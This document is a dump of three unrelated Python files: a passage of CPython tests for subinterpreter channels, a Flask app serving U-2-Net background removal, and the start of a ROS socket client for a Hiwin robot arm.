cid = interpreters._channel_id(10, send=True, force=True)
self.assertEqual(cid.end, 'send')
cid = interpreters._channel_id(10, send=True, recv=False, force=True)
self.assertEqual(cid.end, 'send')
cid = interpreters._channel_id(10, recv=True, force=True)
self.assertEqual(cid.end, 'recv')
cid = interpreters._channel_id(10, recv=True, send=False, force=True)
self.assertEqual(cid.end, 'recv')
cid = interpreters._channel_id(10, send=True, recv=True, force=True)
self.assertEqual(cid.end, 'both')
def test_coerce_id(self):
class Int(str):
def __index__(self):
return 10
cid = interpreters._channel_id(Int(), force=True)
self.assertEqual(int(cid), 10)
def test_bad_id(self):
self.assertRaises(TypeError, interpreters._channel_id, object())
self.assertRaises(TypeError, interpreters._channel_id, 10.0)
self.assertRaises(TypeError, interpreters._channel_id, '10')
self.assertRaises(TypeError, interpreters._channel_id, b'10')
self.assertRaises(ValueError, interpreters._channel_id, -1)
self.assertRaises(OverflowError, interpreters._channel_id, 2**64)
def test_bad_kwargs(self):
with self.assertRaises(ValueError):
interpreters._channel_id(10, send=False, recv=False)
def test_does_not_exist(self):
cid = interpreters.channel_create()
with self.assertRaises(interpreters.ChannelNotFoundError):
interpreters._channel_id(int(cid) + 1) # unforced
def test_str(self):
cid = interpreters._channel_id(10, force=True)
self.assertEqual(str(cid), '10')
def test_repr(self):
cid = interpreters._channel_id(10, force=True)
self.assertEqual(repr(cid), 'ChannelID(10)')
cid = interpreters._channel_id(10, send=True, force=True)
self.assertEqual(repr(cid), 'ChannelID(10, send=True)')
cid = interpreters._channel_id(10, recv=True, force=True)
self.assertEqual(repr(cid), 'ChannelID(10, recv=True)')
cid = interpreters._channel_id(10, send=True, recv=True, force=True)
self.assertEqual(repr(cid), 'ChannelID(10)')
def test_equality(self):
cid1 = interpreters.channel_create()
cid2 = interpreters._channel_id(int(cid1))
cid3 = interpreters.channel_create()
self.assertTrue(cid1 == cid1)
self.assertTrue(cid1 == cid2)
self.assertTrue(cid1 == int(cid1))
self.assertTrue(int(cid1) == cid1)
self.assertTrue(cid1 == float(int(cid1)))
self.assertTrue(float(int(cid1)) == cid1)
self.assertFalse(cid1 == float(int(cid1)) + 0.1)
self.assertFalse(cid1 == str(int(cid1)))
self.assertFalse(cid1 == 2**1000)
self.assertFalse(cid1 == float('inf'))
self.assertFalse(cid1 == 'spam')
self.assertFalse(cid1 == cid3)
self.assertFalse(cid1 != cid1)
self.assertFalse(cid1 != cid2)
self.assertTrue(cid1 != cid3)
class ChannelTests(TestBase):
def test_create_cid(self):
cid = interpreters.channel_create()
self.assertIsInstance(cid, interpreters.ChannelID)
def test_sequential_ids(self):
before = interpreters.channel_list_all()
id1 = interpreters.channel_create()
id2 = interpreters.channel_create()
id3 = interpreters.channel_create()
after = interpreters.channel_list_all()
self.assertEqual(id2, int(id1) + 1)
self.assertEqual(id3, int(id2) + 1)
self.assertEqual(set(after) - set(before), {id1, id2, id3})
def test_ids_global(self):
id1 = interpreters.create()
out = _run_output(id1, dedent("""
import _xxsubinterpreters as _interpreters
cid = _interpreters.channel_create()
print(cid)
"""))
cid1 = int(out.strip())
id2 = interpreters.create()
out = _run_output(id2, dedent("""
import _xxsubinterpreters as _interpreters
cid = _interpreters.channel_create()
print(cid)
"""))
cid2 = int(out.strip())
self.assertEqual(cid2, int(cid1) + 1)
####################
def test_send_recv_main(self):
cid = interpreters.channel_create()
orig = b'spam'
interpreters.channel_send(cid, orig)
obj = interpreters.channel_recv(cid)
self.assertEqual(obj, orig)
self.assertIsNot(obj, orig)
def test_send_recv_same_interpreter(self):
id1 = interpreters.create()
out = _run_output(id1, dedent("""
import _xxsubinterpreters as _interpreters
cid = _interpreters.channel_create()
orig = b'spam'
_interpreters.channel_send(cid, orig)
obj = _interpreters.channel_recv(cid)
assert obj is not orig
assert obj == orig
"""))
def test_send_recv_different_interpreters(self):
cid = interpreters.channel_create()
id1 = interpreters.create()
out = _run_output(id1, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_send({cid}, b'spam')
"""))
obj = interpreters.channel_recv(cid)
self.assertEqual(obj, b'spam')
def test_send_recv_different_threads(self):
cid = interpreters.channel_create()
def f():
while True:
try:
obj = interpreters.channel_recv(cid)
break
except interpreters.ChannelEmptyError:
time.sleep(0.1)
interpreters.channel_send(cid, obj)
t = threading.Thread(target=f)
t.start()
interpreters.channel_send(cid, b'spam')
t.join()
obj = interpreters.channel_recv(cid)
self.assertEqual(obj, b'spam')
def test_send_recv_different_interpreters_and_threads(self):
cid = interpreters.channel_create()
id1 = interpreters.create()
out = None
def f():
nonlocal out
out = _run_output(id1, dedent(f"""
import time
import _xxsubinterpreters as _interpreters
while True:
try:
obj = _interpreters.channel_recv({cid})
break
except _interpreters.ChannelEmptyError:
time.sleep(0.1)
assert(obj == b'spam')
_interpreters.channel_send({cid}, b'eggs')
"""))
t = threading.Thread(target=f)
t.start()
interpreters.channel_send(cid, b'spam')
t.join()
obj = interpreters.channel_recv(cid)
self.assertEqual(obj, b'eggs')
def test_send_not_found(self):
with self.assertRaises(interpreters.ChannelNotFoundError):
interpreters.channel_send(10, b'spam')
def test_recv_not_found(self):
with self.assertRaises(interpreters.ChannelNotFoundError):
interpreters.channel_recv(10)
def test_recv_empty(self):
cid = interpreters.channel_create()
with self.assertRaises(interpreters.ChannelEmptyError):
interpreters.channel_recv(cid)
def test_run_string_arg_unresolved(self):
cid = interpreters.channel_create()
interp = interpreters.create()
out = _run_output(interp, dedent("""
import _xxsubinterpreters as _interpreters
print(cid.end)
_interpreters.channel_send(cid, b'spam')
"""),
dict(cid=cid.send))
obj = interpreters.channel_recv(cid)
self.assertEqual(obj, b'spam')
self.assertEqual(out.strip(), 'send')
# XXX For now there is no high-level channel into which the
# sent channel ID can be converted...
# Note: this test caused crashes on some buildbots (bpo-33615).
@unittest.skip('disabled until high-level channels exist')
def test_run_string_arg_resolved(self):
cid = interpreters.channel_create()
cid = interpreters._channel_id(cid, _resolve=True)
interp = interpreters.create()
out = _run_output(interp, dedent("""
import _xxsubinterpreters as _interpreters
print(chan.id.end)
_interpreters.channel_send(chan.id, b'spam')
"""),
dict(chan=cid.send))
obj = interpreters.channel_recv(cid)
self.assertEqual(obj, b'spam')
self.assertEqual(out.strip(), 'send')
# close
def test_close_single_user(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_close(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_close_multiple_users(self):
cid = interpreters.channel_create()
id1 = interpreters.create()
id2 = interpreters.create()
interpreters.run_string(id1, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_send({cid}, b'spam')
"""))
interpreters.run_string(id2, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_recv({cid})
"""))
interpreters.channel_close(cid)
with self.assertRaises(interpreters.RunFailedError) as cm:
interpreters.run_string(id1, dedent(f"""
_interpreters.channel_send({cid}, b'spam')
"""))
self.assertIn('ChannelClosedError', str(cm.exception))
with self.assertRaises(interpreters.RunFailedError) as cm:
interpreters.run_string(id2, dedent(f"""
_interpreters.channel_send({cid}, b'spam')
"""))
self.assertIn('ChannelClosedError', str(cm.exception))
def test_close_multiple_times(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_close(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_close(cid)
def test_close_empty(self):
tests = [
(False, False),
(True, False),
(False, True),
(True, True),
]
for send, recv in tests:
with self.subTest((send, recv)):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_close(cid, send=send, recv=recv)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_close_defaults_with_unused_items(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
with self.assertRaises(interpreters.ChannelNotEmptyError):
interpreters.channel_close(cid)
interpreters.channel_recv(cid)
interpreters.channel_send(cid, b'eggs')
def test_close_recv_with_unused_items_unforced(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
with self.assertRaises(interpreters.ChannelNotEmptyError):
interpreters.channel_close(cid, recv=True)
interpreters.channel_recv(cid)
interpreters.channel_send(cid, b'eggs')
interpreters.channel_recv(cid)
interpreters.channel_recv(cid)
interpreters.channel_close(cid, recv=True)
def test_close_send_with_unused_items_unforced(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
interpreters.channel_close(cid, send=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
interpreters.channel_recv(cid)
interpreters.channel_recv(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_close_both_with_unused_items_unforced(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
with self.assertRaises(interpreters.ChannelNotEmptyError):
interpreters.channel_close(cid, recv=True, send=True)
interpreters.channel_recv(cid)
interpreters.channel_send(cid, b'eggs')
interpreters.channel_recv(cid)
interpreters.channel_recv(cid)
interpreters.channel_close(cid, recv=True)
def test_close_recv_with_unused_items_forced(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
interpreters.channel_close(cid, recv=True, force=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_close_send_with_unused_items_forced(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
interpreters.channel_close(cid, send=True, force=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_close_both_with_unused_items_forced(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
interpreters.channel_close(cid, send=True, recv=True, force=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_close_never_used(self):
cid = interpreters.channel_create()
interpreters.channel_close(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'spam')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_close_by_unassociated_interp(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interp = interpreters.create()
interpreters.run_string(interp, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_close({cid}, force=True)
"""))
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_close(cid)
def test_close_used_multiple_times_by_single_user(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_close(cid, force=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
class ChannelReleaseTests(TestBase):
# XXX Add more test coverage a la the tests for close().
"""
- main / interp / other
- run in: current thread / new thread / other thread / different threads
- end / opposite
- force / no force
- used / not used (associated / not associated)
- empty / emptied / never emptied / partly emptied
- closed / not closed
- released / not released
- creator (interp) / other
- associated interpreter not running
- associated interpreter destroyed
"""
"""
use
pre-release
release
after
check
"""
"""
release in: main, interp1
creator: same, other (incl. interp2)
use: None,send,recv,send/recv in None,same,other(incl. interp2),same+other(incl. interp2),all
pre-release: None,send,recv,both in None,same,other(incl. interp2),same+other(incl. interp2),all
pre-release forced: None,send,recv,both in None,same,other(incl. interp2),same+other(incl. interp2),all
release: same
release forced: same
use after: None,send,recv,send/recv in None,same,other(incl. interp2),same+other(incl. interp2),all
release after: None,send,recv,send/recv in None,same,other(incl. interp2),same+other(incl. interp2),all
check released: send/recv for same/other(incl. interp2)
check closed: send/recv for same/other(incl. interp2)
"""
def test_single_user(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_release(cid, send=True, recv=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_multiple_users(self):
cid = interpreters.channel_create()
id1 = interpreters.create()
id2 = interpreters.create()
interpreters.run_string(id1, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_send({cid}, b'spam')
"""))
out = _run_output(id2, dedent(f"""
import _xxsubinterpreters as _interpreters
obj = _interpreters.channel_recv({cid})
_interpreters.channel_release({cid})
print(repr(obj))
"""))
interpreters.run_string(id1, dedent(f"""
_interpreters.channel_release({cid})
"""))
self.assertEqual(out.strip(), "b'spam'")
def test_no_kwargs(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_release(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_multiple_times(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_release(cid, send=True, recv=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_release(cid, send=True, recv=True)
def test_with_unused_items(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
interpreters.channel_release(cid, send=True, recv=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_never_used(self):
cid = interpreters.channel_create()
interpreters.channel_release(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'spam')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_by_unassociated_interp(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interp = interpreters.create()
interpreters.run_string(interp, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_release({cid})
"""))
obj = interpreters.channel_recv(cid)
interpreters.channel_release(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
self.assertEqual(obj, b'spam')
def test_close_if_unassociated(self):
# XXX Something's not right with this test...
cid = interpreters.channel_create()
interp = interpreters.create()
interpreters.run_string(interp, dedent(f"""
import _xxsubinterpreters as _interpreters
obj = _interpreters.channel_send({cid}, b'spam')
_interpreters.channel_release({cid})
"""))
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_partially(self):
# XXX Is partial close too weird/confusing?
cid = interpreters.channel_create()
interpreters.channel_send(cid, None)
interpreters.channel_recv(cid)
interpreters.channel_send(cid, b'spam')
interpreters.channel_release(cid, send=True)
obj = interpreters.channel_recv(cid)
self.assertEqual(obj, b'spam')
def test_used_multiple_times_by_single_user(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_release(cid, send=True, recv=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
class ChannelCloseFixture(namedtuple('ChannelCloseFixture',
'end interp other extra creator')):
# Set this to True to avoid creating interpreters, e.g. when
# scanning through test permutations without running them.
QUICK = False
def __new__(cls, end, interp, other, extra, creator):
assert end in ('send', 'recv')
if cls.QUICK:
known = {}
else:
interp = Interpreter.from_raw(interp)
other = Interpreter.from_raw(other)
extra = Interpreter.from_raw(extra)
known = {
interp.name: interp,
other.name: other,
extra.name: extra,
}
if not creator:
creator = 'same'
self = super().__new__(cls, end, interp, other, extra, creator)
self._prepped = set()
self._state = ChannelState()
self._known = known
return self
@property
def state(self):
return self._state
@property
def cid(self):
try:
return self._cid
except AttributeError:
creator = self._get_interpreter(self.creator)
self._cid = self._new_channel(creator)
return self._cid
def get_interpreter(self, interp):
interp = self._get_interpreter(interp)
self._prep_interpreter(interp)
return interp
def expect_closed_error(self, end=None):
if end is None:
end = self.end
if end == 'recv' and self.state.closed == 'send':
return False
return bool(self.state.closed)
def prep_interpreter(self, interp):
self._prep_interpreter(interp)
def record_action(self, action, result):
self._state = result
def clean_up(self):
clean_up_interpreters()
clean_up_channels()
# internal methods
def _new_channel(self, creator):
if creator.name == 'main':
return interpreters.channel_create()
else:
ch = interpreters.channel_create()
run_interp(creator.id, f"""
import _xxsubinterpreters
cid = _xxsubinterpreters.channel_create()
# We purposefully send back an int to avoid tying the
# channel to the other interpreter.
_xxsubinterpreters.channel_send({ch}, int(cid))
del _xxsubinterpreters
""")
self._cid = interpreters.channel_recv(ch)
return self._cid
def _get_interpreter(self, interp):
if interp in ('same', 'interp'):
return self.interp
elif interp == 'other':
return self.other
elif interp == 'extra':
return self.extra
else:
name = interp
try:
interp = self._known[name]
except KeyError:
interp = self._known[name] = Interpreter(name)
return interp
def _prep_interpreter(self, interp):
if interp.id in self._prepped:
return
self._prepped.add(interp.id)
if interp.name == 'main':
return
run_interp(interp.id, f"""
import _xxsubinterpreters as interpreters
import test.test__xxsubinterpreters as helpers
ChannelState = helpers.ChannelState
try:
cid
except NameError:
cid = interpreters._channel_id({self.cid})
""")
@unittest.skip('these tests take several hours to run')
class ExhaustiveChannelTests(TestBase):
"""
- main / interp / other
- run in: current thread / new thread / other thread / different threads
- end / opposite
- force / no force
- used / not used (associated / not associated)
- empty / emptied / never emptied / partly emptied
- closed / not closed
- released / not released
- creator (interp) / other
- associated interpreter not running
- associated interpreter destroyed
- close after unbound
"""
"""
use
pre-close
close
after
check
"""
"""
close in: main, interp1
creator: same, other, extra
use: None,send,recv,send/recv in None,same,other,same+other,all
pre-close: None,send,recv in None,same,other,same+other,all
pre-close forced: None,send,recv in None,same,other,same+other,all
close: same
close forced: same
use after: None,send,recv,send/recv in None,same,other,extra,same+other,all
close after: None,send,recv,send/recv in None,same,other,extra,same+other,all
check closed: send/recv for same/other(incl. interp2)
"""
def iter_action_sets(self):
# - used / not used (associated / not associated)
# - empty / emptied / never emptied / partly emptied
# - closed / not closed
# - released / not released
# never used
yield []
# only pre-closed (and possible used after)
for closeactions in self._iter_close_action_sets('same', 'other'):
yield closeactions
for postactions in self._iter_post_close_action_sets():
yield closeactions + postactions
for closeactions in self._iter_close_action_sets('other', 'extra'):
yield closeactions
for postactions in self._iter_post_close_action_sets():
yield closeactions + postactions
# used
for useactions in self._iter_use_action_sets('same', 'other'):
yield useactions
for closeactions in self._iter_close_action_sets('same', 'other'):
actions = useactions + closeactions
yield actions
for postactions in self._iter_post_close_action_sets():
yield actions + postactions
for closeactions in self._iter_close_action_sets('other', 'extra'):
actions = useactions + closeactions
yield actions
for postactions in self._iter_post_close_action_sets():
yield actions + postactions
for useactions in self._iter_use_action_sets('other', 'extra'):
yield useactions
for closeactions in self._iter_close_action_sets('same', 'other'):
actions = useactions + closeactions
yield actions
for postactions in self._iter_post_close_action_sets():
yield actions + postactions
for closeactions in self._iter_close_action_sets('other', 'extra'):
actions = useactions + closeactions
yield actions
for postactions in self._iter_post_close_action_sets():
yield actions + postactions
def _iter_use_action_sets(self, interp1, interp2):
interps = (interp1, interp2)
# only recv end used
yield [
ChannelAction('use', 'recv', interp1),
]
yield [
ChannelAction('use', 'recv', interp2),
]
yield [
ChannelAction('use', 'recv', interp1),
ChannelAction('use', 'recv', interp2),
]
# never emptied
yield [
ChannelAction('use', 'send', interp1),
]
yield [
ChannelAction('use', 'send', interp2),
]
yield [
ChannelAction('use', 'send', interp1),
ChannelAction('use', 'send', interp2),
]
# partially emptied
for interp1 in interps:
for interp2 in interps:
for interp3 in interps:
yield [
ChannelAction('use', 'send', interp1),
ChannelAction('use', 'send', interp2),
ChannelAction('use', 'recv', interp3),
]
# fully emptied
for interp1 in interps:
for interp2 in interps:
for interp3 in interps:
for interp4 in interps:
yield [
ChannelAction('use', 'send', interp1),
ChannelAction('use', 'send', interp2),
ChannelAction('use', 'recv', interp3),
ChannelAction('use', 'recv', interp4),
]
def _iter_close_action_sets(self, interp1, interp2):
ends = ('recv', 'send')
interps = (interp1, interp2)
for force in (True, False):
op = 'force-close' if force else 'close'
for interp in interps:
for end in ends:
yield [
ChannelAction(op, end, interp),
]
for recvop in ('close', 'force-close'):
for sendop in ('close', 'force-close'):
for recv in interps:
for send in interps:
yield [
ChannelAction(recvop, 'recv', recv),
ChannelAction(sendop, 'send', send),
]
def _iter_post_close_action_sets(self):
for interp in ('same', 'extra', 'other'):
yield [
ChannelAction('use', 'recv', interp),
]
yield [
ChannelAction('use', 'send', interp),
]
def run_actions(self, fix, actions):
for action in actions:
self.run_action(fix, action)
def run_action(self, fix, action, *, hideclosed=True):
end = action.resolve_end(fix.end)
interp = action.resolve_interp(fix.interp, fix.other, fix.extra)
fix.prep_interpreter(interp)
if interp.name == 'main':
result = run_action(
fix.cid,
action.action,
end,
fix.state,
hideclosed=hideclosed,
)
fix.record_action(action, result)
else:
_cid = interpreters.channel_create()
run_interp(interp.id, f"""
result = helpers.run_action(
{fix.cid},
{repr(action.action)},
{repr(end)},
{repr(fix.state)},
hideclosed={hideclosed},
)
interpreters.channel_send({_cid}, result.pending.to_bytes(1, 'little'))
interpreters.channel_send({_cid}, b'X' if result.closed else b'')
""")
result = ChannelState(
pending=int.from_bytes(interpreters.channel_recv(_cid), 'little'),
closed=bool(interpreters.channel_recv(_cid)),
)
fix.record_action(action, result)
def iter_fixtures(self):
# XXX threads?
interpreters = [
('main', 'interp', 'extra'),
('interp', 'main', 'extra'),
('interp1', 'interp2', 'extra'),
('interp1', 'interp2', 'main'),
]
for interp, other, extra in interpreters:
for creator in ('same', 'other', 'creator'):
for end in ('send', 'recv'):
yield ChannelCloseFixture(end, interp, other, extra, creator)
def _close(self, fix, *, force):
op = 'force-close' if force else 'close'
close = ChannelAction(op, fix.end, 'same')
if not fix.expect_closed_error():
self.run_action(fix, close, hideclosed=False)
else:
with self.assertRaises(interpreters.ChannelClosedError):
self.run_action(fix, close, hideclosed=False)
def _assert_closed_in_interp(self, fix, interp=None):
if interp is None or interp.name == 'main':
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(fix.cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(fix.cid, b'spam')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_close(fix.cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_close(fix.cid, force=True)
else:
run_interp(interp.id, f"""
with helpers.expect_channel_closed():
interpreters.channel_recv(cid)
""")
run_interp(interp.id, f"""
with helpers.expect_channel_closed():
interpreters.channel_send(cid, b'spam')
""")
run_interp(interp.id, f"""
with helpers.expect_channel_closed():
interpreters.channel_close(cid)
""")
run_interp(interp.id, f"""
with helpers.expect_channel_closed():
interpreters.channel_close(cid, force=True)
""")
def _assert_closed(self, fix):
self.assertTrue(fix.state.closed)
for _ in range(fix.state.pending):
interpreters.channel_recv(fix.cid)
self._assert_closed_in_interp(fix)
for interp in ('same', 'other'):
interp = fix.get_interpreter(interp)
if interp.name == 'main':
continue
self._assert_closed_in_interp(fix, interp)
interp = fix.get_interpreter('fresh')
self._assert_closed_in_interp(fix, interp)
def _iter_close_tests(self, verbose=False):
i = 0
for actions in self.iter_action_sets():
print()
for fix in self.iter_fixtures():
i += 1
if i > 1000:
return
if verbose:
if (i - 1) % 6 == 0:
print()
print(i, fix, '({} actions)'.format(len(actions)))
else:
if (i - 1) % 6 == 0:
print(' ', end='')
print('.', end=''); sys.stdout.flush()
yield i, fix, actions
if verbose:
print('---')
print()
# This is useful for scanning through the possible tests.
def _skim_close_tests(self):
ChannelCloseFixture.QUICK = True
for i, fix, actions in self._iter_close_tests():
pass
def test_close(self):
for i, fix, actions in self._iter_close_tests():
with self.subTest('{} {} {}'.format(i, fix, actions)):
fix.prep_interpreter(fix.interp)
self.run_actions(fix, actions)
self._close(fix, force=False)
self._assert_closed(fix)
# XXX Things slow down if we have too many interpreters.
fix.clean_up()
def test_force_close(self):
for i, fix, actions in self._iter_close_tests():
with self.subTest('{} {} {}'.format(i, fix, actions)):
fix.prep_interpreter(fix.interp)
self.run_actions(fix, actions)
self._close(fix, force=True)
self._assert_closed(fix)
# XXX Things slow down if we have too many interpreters.
fix.clean_up()
if __name__ == '__main__':
unittest.main()
|
app.py
|
import os
import io
import uuid
import shutil
import sys
import threading
import time
from queue import Empty, Queue
import cv2
from flask import Flask, render_template, flash, send_file, request, jsonify, url_for
from PIL import Image
import numpy as np
from u2net_test import U_2net
from werkzeug.utils import secure_filename
#################################################################
app = Flask(__name__, template_folder="templates", static_url_path="/static")
DATA_FOLDER = "data"
# Init Cartoonizer and load its weights
requests_queue = Queue()
BATCH_SIZE = 1
CHECK_INTERVAL = 0.1
##################################################################
# pre-train
net = U_2net.getNet()
# run
def run(input_file, file_type, f_path):
try:
if file_type == "image":
f_name = str(uuid.uuid4())
save_path = f_path + '/' + f_name + '.jpg'
# Original Image Save
input_file.save(save_path)
# Run model
image_list = U_2net.getData(f_path)
loader = U_2net.getLoader(image_list)
U_2net.run(image_list, loader, net, f_path)
# 디렉토리에 jpg,png 또는 png하나 생김
# return result_path
result_path = f_path + '/' + f_name + '.png'
return result_path
except Exception as e:
print(e)
return 500
# Queueing
def handle_requests_by_batch():
try:
while True:
requests_batch = []
while not (
len(requests_batch)
>= BATCH_SIZE # or
# (len(requests_batch) > 0 #and time.time() - requests_batch[0]['time'] > BATCH_TIMEOUT)
):
try:
requests_batch.append(
requests_queue.get(timeout=CHECK_INTERVAL))
except Empty:
continue
batch_outputs = []
for request in requests_batch:
batch_outputs.append(
run(request["input"][0], request["input"]
[1], request["input"][2])
)
for request, output in zip(requests_batch, batch_outputs):
request["output"] = output
except Exception as e:
while not requests_queue.empty():
requests_queue.get()
print(e)
# Thread Start
threading.Thread(target=handle_requests_by_batch).start()
@app.route("/")
def main():
return render_template("index.html")
@app.route("/predict", methods=["POST"])
def predict():
try:
# print(requests_queue.qsize())
if requests_queue.qsize() >= 1:
return jsonify({"message": "Too Many Requests"}), 429
input_file = request.files["source"]
file_type = request.form["file_type"]
if file_type == "image":
if input_file.content_type not in ["image/jpeg", "image/jpg", "image/png"]:
return jsonify({"message": "Only support jpeg, jpg or png"}), 400
# mkdir and path setting
f_id = str(uuid.uuid4())
f_path = os.path.join(DATA_FOLDER, f_id)
os.makedirs(f_path, exist_ok=True)
req = {"input": [input_file, file_type, f_path]}
requests_queue.put(req)
# Thread output response
while "output" not in req:
time.sleep(CHECK_INTERVAL)
if req["output"] == 500:
return jsonify({"error": "Error! Please upload another file"}), 500
result_path = req["output"]
result = send_file(result_path)
shutil.rmtree(f_path)
return result
except Exception as e:
print(e)
return jsonify({"message": "Error! Please upload another file"}), 400
@app.route("/health")
def health():
return res.sendStatus(200)
if __name__ == "__main__":
from waitress import serve
serve(app, host="0.0.0.0", port=80)
|
Hiwin_RT605_ArmCommand_Socket_20190627192924.py
|
#!/usr/bin/env python3
# license removed for brevity
import rospy
import os
import socket
##多執行序
import threading
import time
import sys
import matplotlib as plot
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import numpy as np
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
from std_msgs.msg import Int32MultiArray
import math
import enum
Socket = 0
data = '0' #設定傳輸資料初始值
Arm_feedback = 1 #假設手臂忙碌
NAME = 'socket_server'
arm_mode_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0.0,36.8,11.35,-90.0,0.0,0.0)
##------------class socket_cmd---------
class socket_data():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
socket_cmd = socket_data(0,0.0,0,0,0,0,0)
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
raise StopIteration
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
class StateFeedback():
def __init__(self,ArmState,SentFlag):
self.ArmState = ArmState
self.SentFlag = SentFlag
state_feedback = StateFeedback(0,0)
class client():
def __init__(self):
self.get_connect()
def get_connect(self):
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s.connect(('192.168.0.1', 8080))
def send(self, msg):
self.s.send(msg.encode('utf-8')) #用utf-8來encode,還有其他encode的方法,str用utf-8就OK!
def get_recieve(self):
data = self.s.recv(1024) #1024指定buffer的大小,限制一次收多少
data.decode('utf-8')
return data
def close(self):
self.s.close()
def point_data(x,y,z,pitch,roll,yaw): ##接收策略端傳送位姿資料
pos.x = x
pos.y = y
pos.z = z
